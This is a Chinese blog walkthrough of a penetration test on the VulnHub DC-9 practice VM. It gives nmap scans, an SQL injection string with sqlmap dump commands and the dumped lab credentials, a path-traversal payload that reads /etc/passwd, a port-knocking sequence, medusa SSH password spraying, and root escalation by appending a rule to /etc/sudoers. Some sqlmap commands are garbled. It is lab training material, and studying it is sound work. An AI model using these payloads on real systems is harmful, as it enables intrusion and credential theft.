DC-9 靶机渗透测试流程

最新推荐文章于 2024-11-07 21:57:19 发布
最新推荐文章于 2024-11-07 21:57:19 发布
阅读量100 收藏
点赞数
文章标签: 网络 linux 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131874492
版权
文章描述了一次针对靶机的渗透测试过程,包括信息收集、端口扫描、漏洞检测、SQL注入、使用SQLMap爆破数据库、文件包含漏洞利用、端口碰撞技术绕过防火墙、密码喷射攻击以及最终的权限提升步骤,成功获取root权限。
摘要由CSDN通过智能技术生成

靶机下载地址

DC: 9 ~ VulnHub

信息收集

主机探测

sudo nmap -sn 10.10.10.0/24  

获取靶机IP地址10.10.10.22

初步扫描

sudo nmap -sT --min-rate 10000 -p- 10.10.10.22

可知80端口开放

详细信息扫描 

 

sudo nmap -sT -sC -sV -O -p 80 10.10.10.22

可知

80/tcp open  http    Apache httpd 2.4.38 ((Debian))   

Running: Linux 3.X|4.X  

漏洞脚本扫描

sudo nmap -sT --script=vuln -p 80 10.10.10.22

枚举了两个目录,没有扫描出漏洞。

 

渗透过程

SQL注入

访问80端口的search.php目录,这里存在SQL注入,可输入

‘ || 1=1 # 进行验证,能够获取到所有人的信息。

 

 使用SQLMAP 爆破数据库

sudo -r sql --level 5 --risk 3 --dbs --batch

sudo -r sql --level 5 --risk 3 -D Staff -T Users --dump --batch

sudo sqlmap -r sql --level 5 --risk 3 -D users --dump

获得两组用户

后台登陆:

admin transorbital1

未知用户:
marym 3kfs86sfd

julied 468sfdfsd2

fredf 4sfd87sfd1

barneyr RocksOff

tomc TC&TheBoyz

jerrym B8m#48sd

wilmaf Pebbles

bettyr BamBam01

chandlerb UrAG0D!

joeyt Passw0rd

rachelg yN72#dsd

rossg ILoveRachel

monicag 3248dsds7s

phoebeb smellycats

scoots YR3BVxxxw87

janitor Ilovepeepee

janitor2 Hawaii-Five-0

 

MD5解密 

 使用somd5.com工具破解哈希值

admin transorbital1

文件包含

登录后台,发现File does not exits关键字,可能存在文件包含

构造payload,成功获取/etc/passwd

http://10.10.10.22/welcome.php?file=../../../../../../../../../../etc/passwd

 

首先介绍一下端口碰撞,这是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。

这里22端口是被过滤的,要想打开就需要用端口碰撞。至于为什么知道,你可以通过查看proc的进程日志文件知道有关knockd进程的信息。

获取/etc/knockd.conf文件内容,查看序列号。

 

 端口碰撞

 使用sudo knock 10.10.10.22 7469 8475 9842碰撞端口

密码喷射 

使用medusa查看哪些用户可以登录

sudo medusa -M ssh -h 10.10.10.22 -n 22 -U u -P p -t 10|grep 'SUCCESS'   

一共是发现3个

User: janitor Password: Ilovepeepee [SUCCESS]

User: joeyt Password: Passw0rd [SUCCESS]   

User: chandlerb Password: UrAG0D! [SUCCESS]

SSH登录 

使用User: janitor Password: Ilovepeepee 登录

敏感文件 

使用find /home/ 2>/dev/null查敏感文件

这里发现一个敏感文件,里面装的似乎是密码。

 二次密码喷射

合并密码,去除已检验出的账户,重新medusa尝试ssh登录。

结果是发现一个新的账户

User: fredf Password: B4-Tru3-001 [SUCCESS]    

权限提升 

SSH登录到

User: fredf Password: B4-Tru3-001 [SUCCESS]      

发现被root授予了一个免密码的SUID

查看该二进制文件源码,接收两个文件参数,将参数1的内容追加到参数2.

新建一个shit文件写入 fredf ALL=(ALL:ALL) ALL">/tmp/shit

然后执行sudo ./test /tmp/shit /etc/sudoers

 使用sudo su切换到root,在root目录下查看flag

总结 

通过SQL注入拿到后台账户密码和一组未知用户密码,登录到网站后台通过文件包含查询konckd.conf获取序列值,通过konck进行端口碰撞打开22端口,通过medusa密码喷射登录SSH,查找敏感文件再次密码喷射登录,最后利用SUID提权。

 

Teardrop、
关注
DC-9靶机渗透详细流程
braty_的博客
02-09 895
DC-9靶机详细流程
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3017
DC-2靶机渗透测试思路及流程
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5901
DC靶机系列渗透教程
DC-7靶机渗透详细流程
braty_的博客
02-07 1598
DC-7靶机渗透详细流程
DC-5靶机详细渗透流程
braty_的博客
01-27 2189
DC-5靶机渗透详细流程
DC-4靶机渗透测试
qq_60463414的博客
07-07 2584
DC4靶机shell反弹,提权流程。
DC-6靶机渗透测试详细教程
啊醒的博客
05-04 2797
DC-6靶机渗透测试详细教程
DC-1靶机渗透详细流程
braty_的博客
01-12 897
DC-1靶机渗透 详细流程
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 2020
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 481
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录 ...二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1271
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1459
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-1靶机渗透详细过程(附靶机连接)
bwt_D的博客
05-19 806
查看本机的ip地址 使用nmap进行ip地址扫描,确定靶机的IP nmap -sP 192.168.159.1/24 对其进行详细扫描 nmap -A 192.168.159.140 -p 1-65535 80端口开放,直接使用浏览器访问 使用MSF搜索该网页模板存在的漏洞 msfconsole search drupal 使用第四个攻击模块 use exploit/unix/webapp/drupal_drupalgeddon2 选择攻击载荷 set payload php/meterpreter
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1010
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
防火墙|WAF|漏洞|网络安全
qq_43777616的博客
11-06 863
防火墙|WAF|漏洞|网络安全
第六章传输层协议、ACL
2401_86349554的博客
11-05 850
第六章传输层协议、ACL
06 网络编程基础
最新发布
Elaine2391的博客
11-07 1028
如果客户端发送的数据没有明确的结束标记,服务器可能会一直等待更多的数据,而客户端则可能因为没有收到响应而卡住。System.out.println("======以下代码是读取响应的结果======");通过这些方法,你可以确保客户端和服务器之间的通信具有明确的数据边界,避免因缺少结束标记而导致的问题。客户端收到服务器的SYN+ACK包后,发送一个ACK(确认)包,确认收到服务器的SYN+ACK包。System.out.println("接收到的数据报:" + message);
计算机网络综合题
2303_80204192的博客
11-06 506
解题步骤
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值